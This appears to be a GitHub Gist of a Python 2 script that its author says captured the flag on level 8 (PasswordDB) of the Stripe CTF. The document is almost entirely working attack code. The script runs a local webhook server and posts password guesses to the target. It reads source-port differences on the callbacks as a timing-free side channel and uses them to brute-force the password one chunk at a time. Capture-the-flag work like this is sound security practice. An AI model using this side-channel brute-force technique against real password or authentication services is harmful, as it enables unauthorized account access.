Created
November 28, 2012 15:32
-
-
Save saolsen/4162007 to your computer and use it in GitHub Desktop.
My code to capture the flag on the last stripe ctf level
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!usr/bin/env python | |
| # Stephen Olsen | |
| # Script used to hack the stripe ctf level 8 PasswordDB. | |
| # Captures the flag! | |
| import requests | |
| import re | |
| from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer | |
| # global | |
| highport = 35215 | |
| me = 'localhost:' + str(highport) | |
| them = 'http://localhost:3000' | |
| chunk_posibilities = range(999) | |
| test_index = 0 | |
| suffux = '000' | |
| lastport = 0 | |
| chunk = 1 #1, 2, 3, 4 | |
| flag = '' | |
| class MyHandler(BaseHTTPRequestHandler): | |
| def do_POST(self): | |
| global test_index, chunk_posibilities, lastport, flag, chunk | |
| self.send_response(200) | |
| self.send_header('Content-type', 'text/plain') | |
| self.end_headers() | |
| content_len = int(self.headers.getheader('content-length')) | |
| post_body = self.rfile.read(content_len) | |
| success = re.search('({"success": )(.*)(})', post_body).groups()[1]; | |
| if success == 'true': | |
| print "CAPTURED THE FLAG: " + flag + str(chunk_posibilities[test_index]).zfill(3) | |
| return | |
| if len(chunk_posibilities) == 1: | |
| result = str(chunk_posibilities[0]) | |
| print "CHUNK FOUND: " + result | |
| flag = flag + result | |
| chunk = chunk + 1 | |
| test_index = 0 | |
| chunk_posibilities = range(999) | |
| lastport = 0 | |
| #varLen = int(self.headers['Content-Length']) | |
| #postVars = self.rfile.read(varLen) | |
| # Determine if the last sent post was a false value for the first chunk | |
| port = self.client_address[1] | |
| diff = port - lastport | |
| print "Capturing: " + flag + "[" + str(chunk_posibilities[test_index]).zfill(3) + "]" | |
| if diff == chunk + 1: | |
| chunk_posibilities.remove(chunk_posibilities[test_index]) | |
| print "Remaining to test in chunk " + \ | |
| str(chunk)+ ": "+str(len(chunk_posibilities)) | |
| else: | |
| print "POTENTIAL" | |
| test_index = test_index + 1 | |
| if test_index >= len(chunk_posibilities): | |
| test_index = 0 | |
| lastport = port | |
| makeCall() | |
| return | |
| def makeCall(): | |
| global chunk_posibilities, test_index, suffux, flag, chunk | |
| test = flag + str(chunk_posibilities[test_index]).zfill(3) | |
| for x in range(4 - chunk): | |
| test = test + suffux | |
| payload = '{"password": "' + test + '", "webhooks": ["' + me + '"]}' | |
| hit = requests.post(them,data=payload) | |
| def main(): | |
| try: | |
| server = HTTPServer(('', highport), MyHandler) | |
| print 'started server' | |
| server.serve_forever() | |
| except KeyboardInterrupt: | |
| print 'stopping' | |
| server.socket.close() | |
| if __name__ == '__main__': | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment